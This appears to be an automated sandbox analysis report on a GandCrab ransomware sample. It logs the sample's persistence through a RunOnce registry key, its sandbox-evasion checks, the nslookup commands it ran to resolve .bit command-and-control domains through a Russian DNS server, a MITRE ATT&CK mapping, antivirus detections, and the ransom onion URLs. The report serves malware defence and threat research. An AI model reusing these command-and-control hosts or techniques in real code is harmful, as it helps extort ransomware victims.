Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: eW1QrimJYd.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\eW1QrimJYd.exe

Code function: 1_2_00A87DB0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,

1_2_00A87DB0

Source: C:\Users\user\Desktop\eW1QrimJYd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe

Jump to dropped file

Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce cfbtnelfyrp	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce cfbtnelfyrp	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce cfbtnelfyrp	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce cfbtnelfyrp	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess			graph_1-1779
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess			graph_11-1755

Source: C:\Users\user\Desktop\eW1QrimJYd.exe TID: 1792	Thread sleep count: 60 > 30			Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe TID: 1792	Thread sleep time: -600000s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe

Evaded block: after key decision

graph_11-2016

Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Code function: EnumDeviceDrivers,K32EnumDeviceDrivers,VirtualAlloc,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,		1_2_00A82F50
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	Code function: EnumDeviceDrivers,EnumDeviceDrivers,VirtualAlloc,EnumDeviceDrivers,GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,		11_2_00D72F50

Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Code function: 1_2_00A864A0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	1_2_00A864A0
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Code function: 1_2_00A866F0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	1_2_00A866F0
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	Code function: 11_2_00D766F0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	11_2_00D766F0
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	Code function: 11_2_00D764A0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	11_2_00D764A0

Source: C:\Users\user\Desktop\eW1QrimJYd.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\eW1QrimJYd.exe	API call chain: ExitProcess graph end node	graph_1-1729
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	API call chain: ExitProcess graph end node	graph_1-1748
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	API call chain: ExitProcess graph end node	graph_1-1741
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	API call chain: ExitProcess graph end node	graph_1-2199
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	API call chain: ExitProcess graph end node	graph_1-1768
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	API call chain: ExitProcess graph end node	graph_11-1717
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	API call chain: ExitProcess graph end node	graph_11-1744
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	API call chain: ExitProcess graph end node	graph_11-1875

Source: eW1QrimJYd.exe, 00000001.00000002.531861425.00000000008CA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\eW1QrimJYd.exe

Code function: 1_2_00A87DB0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,

1_2_00A87DB0

Source: C:\Users\user\Desktop\eW1QrimJYd.exe

Code function: 1_2_00A839B0 GetProcessHeap,

1_2_00A839B0

Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\eW1QrimJYd.exe

Code function: 1_2_00A83A60 AllocateAndInitializeSid,GetModuleHandleA,GetProcAddress,FreeSid,

1_2_00A83A60

Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\eW1QrimJYd.exe

Code function: 1_2_00A88BC0 cpuid

1_2_00A88BC0

Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior

Source: C:\Users\user\Desktop\eW1QrimJYd.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\eW1QrimJYd.exe

1_2_00A86D90

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Replication Through Removable Media	12 Native API	1 Registry Run Keys / Startup Folder	11 Process Injection	1 Software Packing	1 Input Capture	11 Peripheral Device Discovery	1 Replication Through Removable Media	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Data Encrypted for Impact
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Masquerading	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	2 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Virtualization/Sandbox Evasion	Security Account Manager	1 System Network Connections Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	11 Process Injection	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	44 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	1 Proxy	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	11 Security Software Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 Process Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	1 Remote System Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	2 System Network Configuration Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
eW1QrimJYd.exe	82%	Virustotal		Browse
eW1QrimJYd.exe	86%	Metadefender		Browse
eW1QrimJYd.exe	100%	ReversingLabs	Win32.Ransomware.GandCrab
eW1QrimJYd.exe	100%	Avira	TR/FileCoder.oytet
eW1QrimJYd.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	100%	Avira	TR/FileCoder.oytet
C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
11.0.qvvfpl.exe.d70000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File
1.0.eW1QrimJYd.exe.a80000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File
11.2.qvvfpl.exe.d70000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File
24.0.qvvfpl.exe.d70000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File
1.2.eW1QrimJYd.exe.a80000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File
24.2.qvvfpl.exe.d70000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen3	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://gdcbghvjyqy7jclk.onion.casa/5432c2cfc05a5a97	100%	Avira URL Cloud	malware
http://gdcbghvjyqy7jclk.onion/5432c2cfc05a5a97	0%	Avira URL Cloud	safe
http://gdcbghvjyqy7jclk.onion.top/5432c2cfc05a5a97	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
emsisoft.bit	unknown	unknown	true	unknown
ipv4bot.whatismyipaddress.com	unknown	unknown	false	high
nomoreransom.bit	unknown	unknown	true	unknown
gandcrab.bit	unknown	unknown	true	unknown
dns1.soprodns.ru	unknown	unknown	true	unknown
8.8.8.8.in-addr.arpa	unknown	unknown	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://gdcbghvjyqy7jclk.onion.guide/5432c2cfc05a5a97	eW1QrimJYd.exe, 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/0	eW1QrimJYd.exe, 00000001.00000002.531861425.00000000008CA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.torproject.org/	eW1QrimJYd.exe, 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/D	eW1QrimJYd.exe, 00000001.00000002.531861425.00000000008CA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://gdcbghvjyqy7jclk.onion.casa/5432c2cfc05a5a97	eW1QrimJYd.exe, 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: malware	unknown
http://gdcbghvjyqy7jclk.onion.rip/5432c2cfc05a5a97	eW1QrimJYd.exe, 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmp	false		high
http://ipv4bot.whatismyipaddress.com/	eW1QrimJYd.exe, 00000001.00000002.531861425.00000000008CA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://gdcbghvjyqy7jclk.onion/5432c2cfc05a5a97	eW1QrimJYd.exe, 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: safe	unknown
http://gdcbghvjyqy7jclk.onion.plus/5432c2cfc05a5a97	eW1QrimJYd.exe, 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmp	false		high
